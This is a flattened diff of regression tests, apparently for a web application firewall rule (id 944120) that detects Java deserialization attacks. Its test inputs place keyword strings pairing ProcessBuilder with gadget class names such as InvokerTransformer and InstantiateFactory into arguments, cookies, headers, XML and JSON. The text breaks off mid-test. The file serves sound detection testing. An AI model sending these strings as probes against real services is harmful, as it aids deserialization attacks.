tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -391,7 +409,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: @@ -411,7 +430,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -431,7 +451,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: @@ -451,7 +472,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: @@ -470,7 +492,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -489,7 +512,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -508,7 +532,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -527,7 +552,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -546,7 +572,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: @@ -565,7 +592,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.forclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -584,7 +612,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -603,7 +632,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: @@ -628,7 +658,8 @@ tests: {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -653,7 +684,8 @@ tests: {"ProcessBuilder.evil.forclosure": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -678,7 +710,8 @@ tests: ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: @@ -703,7 +736,8 @@ tests: ProcessBuilder.evil.forclosure -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -722,7 +756,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -741,7 +776,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -761,7 +797,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -781,7 +818,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -801,7 +839,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -820,7 +859,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -839,7 +879,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -858,7 +899,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -877,7 +919,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -896,7 +939,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -915,7 +959,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -934,7 +979,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -953,7 +999,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -978,7 +1025,8 @@ tests: {"ProcessBuilder.evil.instantiatefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -1003,7 +1051,8 @@ tests: {"ProcessBuilder.evil.instantiatefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -1028,7 +1077,8 @@ tests: ProcessBuilder.evil.instantiatefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: @@ -1053,7 +1103,8 @@ tests: ProcessBuilder.evil.instantiatefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1072,7 +1123,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1091,7 +1143,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1111,7 +1164,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1131,7 +1185,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1151,7 +1206,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1170,7 +1226,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1189,7 +1246,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1208,7 +1266,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1227,7 +1286,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1246,7 +1306,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1265,7 +1326,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.instantiatetransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1284,7 +1346,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1303,7 +1366,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1328,7 +1392,8 @@ tests: {"ProcessBuilder.evil.instantiatetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1353,7 +1418,8 @@ tests: {"ProcessBuilder.evil.instantiatetransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1378,7 +1444,8 @@ tests: ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: @@ -1403,7 +1470,8 @@ tests: ProcessBuilder.evil.instantiatetransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1422,7 +1490,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1441,7 +1510,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1461,7 +1531,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1481,7 +1552,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1501,7 +1573,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1520,7 +1593,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1539,7 +1613,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1558,7 +1633,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1577,7 +1653,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1596,7 +1673,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1615,7 +1693,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.invokertransformer" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 80 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1634,7 +1713,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1653,7 +1733,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1678,7 +1759,8 @@ tests: {"ProcessBuilder.evil.invokertransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 83 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1703,7 +1785,8 @@ tests: {"ProcessBuilder.evil.invokertransformer": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1728,7 +1811,8 @@ tests: ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: @@ -1753,7 +1837,8 @@ tests: ProcessBuilder.evil.invokertransformer -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1772,7 +1857,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1791,7 +1877,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1811,7 +1898,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1831,7 +1919,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1851,7 +1940,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1870,7 +1960,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1889,7 +1980,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1908,7 +2000,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1927,7 +2020,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1946,7 +2040,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 96 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1965,7 +2060,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeclonefactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -1984,7 +2080,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2003,7 +2100,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2028,7 +2126,8 @@ tests: {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2053,7 +2152,8 @@ tests: {"ProcessBuilder.evil.prototypeclonefactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2078,7 +2178,8 @@ tests: ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: @@ -2103,7 +2204,8 @@ tests: ProcessBuilder.evil.prototypeclonefactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2122,7 +2224,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2141,7 +2244,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2161,7 +2265,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2181,7 +2286,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2201,7 +2307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2220,7 +2327,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2239,7 +2347,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 110 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2258,7 +2367,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2277,7 +2387,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2296,7 +2407,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2315,7 +2427,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.prototypeserializationfactory" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2334,7 +2447,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2353,7 +2467,8 @@ tests: version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2378,7 +2493,8 @@ tests: {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2403,7 +2519,8 @@ tests: {"ProcessBuilder.evil.prototypeserializationfactory": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2428,7 +2545,8 @@ tests: ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: @@ -2453,7 +2571,8 @@ tests: ProcessBuilder.evil.prototypeserializationfactory -----------------------------thisissparta-- output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2472,7 +2591,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2491,7 +2611,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure=test" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2511,7 +2632,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2531,7 +2653,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2551,7 +2674,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2570,7 +2694,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2589,7 +2714,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944120\"" + log: + no_expect_ids: [944120] - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2608,7 +2734,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2627,7 +2754,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2646,7 +2774,8 @@ tests: version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2665,7 +2794,8 @@ tests: version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2685,7 +2815,8 @@ tests: data: | {"test": "ProcessBuilder.evil.whileclosure"} output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: @@ -2705,7 +2836,8 @@ tests: data: | {"ProcessBuilder.evil.whileclosure": "test"} output: - log_contains: "id \"944120\"" + log: + expect_ids: [944120] - test_id: 133 desc: 